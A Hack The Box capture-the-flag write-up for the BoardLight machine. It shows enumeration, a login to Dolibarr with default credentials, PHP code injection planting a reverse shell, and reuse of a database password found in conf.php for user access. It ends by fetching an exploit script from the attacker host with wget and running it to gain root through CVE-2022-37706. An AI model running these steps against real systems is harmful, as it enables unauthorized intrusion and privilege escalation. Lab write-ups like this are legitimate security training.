Htb_boardlight
title: “HTB BoardLight Writeup” date: 2024-05-26 00:30:00 categories: HTB Machine tags: Default_user_pass PHP Code Injection Binary_exploitation CVE —
Shell as www-data
Enumeration
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
─# nmap -sC -sV -p- -T4 --min-rate=9326 --vv board.htb
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-26 10:51 EDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 10:51
Completed NSE at 10:51, 0.00s elapsed
Initiating Ping Scan at 10:51
Scanning board.htb (10.10.11.11) [4 ports]
Completed Ping Scan at 10:51, 0.28s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:51
Scanning board.htb (10.10.11.11) [65535 ports]
Discovered open port 22/tcp on 10.10.11.11
Discovered open port 80/tcp on 10.10.11.11
only port 22,80 are open so that’s nothing maybe i’ll try enum using subdo enum because on board.htb only landing page so i think the vulnerability on subdomain board.htb
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt -u "http://board.htb" -H "HOST: FUZZ.board.htb" -c -fs 15949
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://board.htb
:: Wordlist : FUZZ: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-20000.txt
:: Header : Host: FUZZ.board.htb
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response size: 15949
________________________________________________
crm [Status: 200, Size: 6360, Words: 397, Lines: 150, Duration: 268ms]
web3452 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 329ms]
web4000 [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 334ms]
wishlist [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 332ms]
Now add crm.board.htb
in /etc/hosts
Identify Vulnerability
The Version of Dolibar is 17.0 so let we research about this vendor to see the vendor vulnerable or not
In Dolibarr 17.0.0 with the CMS Website plugin (core) enabled, an authenticated attacker can obtain remote command execution via php code injection bypassing the application restrictions.
The CMS are vulnerable PHP Code injection but it’s authenticated
1
2
3
4
The default username and password for Dolibarr, a popular open-source ERP and CRM software, often depend on how it was installed and set up. However, the typical default credentials are:
Username: admin
Password: admin
as you can see here the user pass default is admin .
After i put that’s credentials , i successfully login to dashboard
PHP Code Injection
Now click Website
and > click +
> and create your site > Import website template > Click Load anything template it’s ok > Edit page
and put your php revshell code
And click saved
1
2
3
4
5
6
7
8
9
10
11
12
└─# nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.110] from (UNKNOWN) [10.10.11.11] 46260
Linux boardlight 5.15.0-107-generic #117~20.04.1-Ubuntu SMP Tue Apr 30 10:35:57 UTC 2024 x86_64 x86_64 x86_64 GNU/Linux
08:55:52 up 40 min, 4 users, load average: 0.62, 0.46, 0.52
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash: cannot set terminal process group (856): Inappropriate ioctl for device
bash: no job control in this shell
www-data@boardlight:/$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Shell as larissa
After i research on google about “Where the location Dolibarr default config” i got this page
Login larissa user using mysql config dolibarr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ cat conf.php
cat conf.php
<?php
//
// File generated by Dolibarr installer 17.0.0 on May 13, 2024
//
// Take a look at conf.php.example file for an example of conf.php file
// and explanations for all possibles parameters.
//
$dolibarr_main_url_root='http://crm.board.htb';
$dolibarr_main_document_root='/var/www/html/crm.board.htb/htdocs';
$dolibarr_main_url_root_alt='/custom';
$dolibarr_main_document_root_alt='/var/www/html/crm.board.htb/htdocs/custom';
$dolibarr_main_data_root='/var/www/html/crm.board.htb/documents';
$dolibarr_main_db_host='localhost';
$dolibarr_main_db_port='3306';
$dolibarr_main_db_name='dolibarr';
$dolibarr_main_db_prefix='llx_';
$dolibarr_main_db_user='dolibarrowner';
$dolibarr_main_db_pass='serverfun2$2023!!';
the path is conf/conf.php
1
2
3
4
5
www-data@boardlight:~/html/crm.board.htb/htdocs/conf$ su larissa
su larissa
Password: serverfun2$2023!!
id
uid=1000(larissa) gid=1000(larissa) groups=1000(larissa),4(adm)
Shell as root
1
2
3
4
5
6
7
8
9
10
find / -perm -04000 -ls 2>/dev/null
2491 16 -rwsr-xr-x 1 root root 14488 Jul 8 2019 /usr/lib/eject/dmcrypt-get-device
608 16 -rwsr-sr-x 1 root root 14488 Apr 8 18:36 /usr/lib/xorg/Xorg.wrap
17633 28 -rwsr-xr-x 1 root root 26944 Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys
17628 16 -rwsr-xr-x 1 root root 14648 Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_ckpasswd
17627 16 -rwsr-xr-x 1 root root 14648 Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_backlight
17388 16 -rwsr-xr-x 1 root root 14648 Jan 29 2020 /usr/lib/x86_64-linux-gnu/enlightenment/modules/cpufreq/linux-gnu-x86_64-0.23.1/freqset
2368 52 -rwsr-xr-- 1 root messagebus 51344 Oct 25 2022 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
5278 468 -rwsr-xr-x 1 root root 477672 Jan 2 09:13 /usr/lib/openssh/ssh-keysign
10039 388 -rwsr-xr-- 1 root dip 395144 Jul 23 2020 /usr/sbin/pppd
Do you see what i see?? yupp that’s enlightenment binary , i had saw about this binary vulnerability a few month ago and also have tried to download this binary in my ubuntu and trying to priv esc and it’s working
CVE-2022-37706-LPE-exploit
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
wget http://10.10.14.110:8000/eng.sh
--2024-05-26 08:47:03-- http://10.10.14.110:8000/eng.sh
Connecting to 10.10.14.110:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 707 [text/x-sh]
Saving to: ‘eng.sh’
0K 100% 41.3M=0s
2024-05-26 08:47:04 (41.3 MB/s) - ‘eng.sh’ saved [707/707]
bash eng.sh
CVE-2022-37706
[*] Trying to find the vulnerable SUID file...
[*] This may take few seconds...
[+] Vulnerable SUID binary found!
[+] Trying to pop a root shell!
[+] Enjoy the root shell :)
mount: /dev/../tmp/: can't find in /etc/fstab.
id
uid=0(root) gid=0(root) groups=0(root),4(adm),1000(larissa)